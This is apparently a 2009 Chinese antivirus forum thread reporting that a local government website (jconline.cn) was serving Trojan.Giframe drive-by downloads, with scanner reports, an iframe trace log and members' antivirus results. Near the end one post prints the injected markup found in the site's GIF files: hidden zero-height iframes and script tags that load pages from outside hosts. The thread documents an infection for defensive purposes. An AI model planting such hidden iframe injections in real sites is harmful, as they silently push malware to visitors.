一个地方政府网站hxxp://www.jconline.cn/【被挂马】

显示全部楼层 · 发表于 2009-10-16 15:12:30

hxxp://www.jconline.cn/

F版小红伞、NIS均报

Norton Safe Web分析：
http://siterating.norton.com/report/show?url=jconline.cn
貌似比较严重
计算机威胁:  16

启发式病毒
已发现威胁: 8
这是完整列表:
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/images/nophoto.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/hlzxzlr.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/images/bg013.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/images/bg011.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/images/bg012.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/hlzx1.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/images/bg008.gif
威胁名称:  Trojan.Giframe
位置:  hxxp://hl.jconline.cn/hlzxbg2.gif

偷渡式下载
已发现威胁: 8
这是完整列表:
威胁名称:  Trojan.Giframe
文件名:  c:\documents and settings\user\local settings\temporary internet files\content.ie5\4t5l9h3z\bg011[1].gif
位置:  hxxp://hl.jconline.cn/moreshowhl.asp?lm=%c3%89%c2%a5%c3%85%c2%bc%c3%84%c3%90%c3%8a%c2%bf
威胁名称:  Trojan.Giframe
文件名:  c:\documents and settings\user\local settings\temporary internet files\content.ie5\k3rvotvy\nophoto[1].gif
位置:  hxxp://hl.jconline.cn/?lm=%c3%83%c2%80%c3%83%c2%ab%c3%83%c2%92%c3%83%c2%ac%c3%83%c2%84%c3%83%c2%90%c3%83%c2%8a%c3%82%c2%bf&Page=1
威胁名称:  Trojan.Giframe
文件名:  c:\documents and settings\user\local settings\temporary internet files\content.ie5\4t5l9h3z\nophoto[1].gif
位置:  hxxp://hl.jconline.cn/?lm=%C3%83%C2%80%C3%83%C2%AB%C3%83%C2%92%C3%83%C2%AC%C3%83%C2%85%C3%82%C2%AE%C3%83%C2%8A%C3%82%C2%BF&Page=1
威胁名称:  Trojan.Giframe
文件名:  c:\documents and settings\user\local settings\temporary internet files\content.ie5\k3rvotvy\nophoto[1].gif
位置:  hxxp://hl.jconline.cn/?lm=%C3%83%C2%89%C3%82%C2%A5%C3%83%C2%85%C3%82%C2%BC%C3%83%C2%85%C3%82%C2%AE%C3%83%C2%8A%C3%82%C2%BF&Page=1
威胁名称:  Trojan.Giframe
文件名:  c:\documents and settings\user\local settings\temporary internet files\content.ie5\k3rvotvy\nophoto[1].gif
位置:  hxxp://hl.jconline.cn/?lm=%C3%83%C2%8E%C3%82%C2%B4%C3%82%C2%BB%C3%83%C2%A9%C3%83%C2%84%C3%83%C2%90%C3%83%C2%8A%C3%82%C2%BF&Page=1
威胁名称:  直接链接到 Trojan.Giframe
位置:  hxxp://hl.jconline.cn/moreshowhl.asp?lm=%C3%8E%C2%B4%C2%BB%C3%A9%C3%84%C3%90%C3%8A%C2%BF
威胁名称:  直接链接到 Trojan.Giframe
位置:  hxxp://hl.jconline.cn/moreshowhl.asp?lm=%c3%89%c2%a5%c3%85%c2%bc%c3%85%c2%ae%c3%8a%c2%bf
威胁名称:  直接链接到 Trojan.Giframe
位置:  hxxp://hl.jconline.cn/moreshowhl.asp?lm=%C3%80%C3%AB%C3%92%C3%AC%C3%85%C2%AE%C3%8A%C2%BF

[ 本帖最后由 lomo 于 2009-10-16 15:16 编辑 ]

显示全部楼层 · 发表于 2009-10-16 15:25:03

关闭红伞进去 ESET 网盾都不报

[ 本帖最后由绑架卡饭高层于 2009-10-16 15:26 编辑 ]

显示全部楼层 · 发表于 2009-10-16 15:27:24

Log generated by anonymous use mdecoder 0.26
[root]http://www.jconline.cn/
[iframe]http://www.jconline.cn/zw/zwzt/2009/9jczlt/channel_5953.htm
[iframe]http://www3.jconline.cn/tqyb/1/yycx/610_265sygdpic/gdpic.asp
[iframe]http://12345.jconline.cn/channel_4884.htm
[exe]http://www.jconline.cn/images/style_sy.css
[iframe]http://203.207.99.16/addpartmaarchives.html
[iframe]http://www.jconline.cn/investigate/diaocha_new.jsp?channelid=116
[exe]http://www.jconline.cn/images/style_sy.css
确实网盾不报

显示全部楼层 · 发表于 2009-10-16 17:29:05

avast没报，avira也没发现

显示全部楼层 · 发表于 2009-10-16 17:32:13

显示全部楼层 · 发表于 2009-10-16 18:36:22

看样子是script virus, 应该是avast在前面挡掉了但没显示出来，如果关了avast，红伞会报的，以前我验证过；

显示全部楼层 · 发表于 2009-10-16 18:48:54

kis2010未报！

显示全部楼层 · 发表于 2009-10-16 23:56:23

是脚本病毒两个

显示全部楼层 · 发表于 2009-10-17 00:10:05

没发现，求解答

显示全部楼层 · 发表于 2009-10-17 00:27:44

诺顿报的gif里面所包含的内容

language="JavaScript" charset="gb2312" type="text/javascript" src="http://www8.itsun.com/count.php?uuid=1717901&style=none"></script><script id="advjs" src="http://w.vvcyin.com/adv.js?showmatrix_num=074"></script>
<iframe src=http://www.sports-tw.com/Admin/htmledit/Dialog/help/guige.htm width=100 height=0></iframe>
<iframe src=http://www.66ki.cn/index.htm width=100 height=0></iframe>

[已鉴定] 一个地方政府网站hxxp://www.jconline.cn/【被挂马】

回复 4楼 edwardcl 的帖子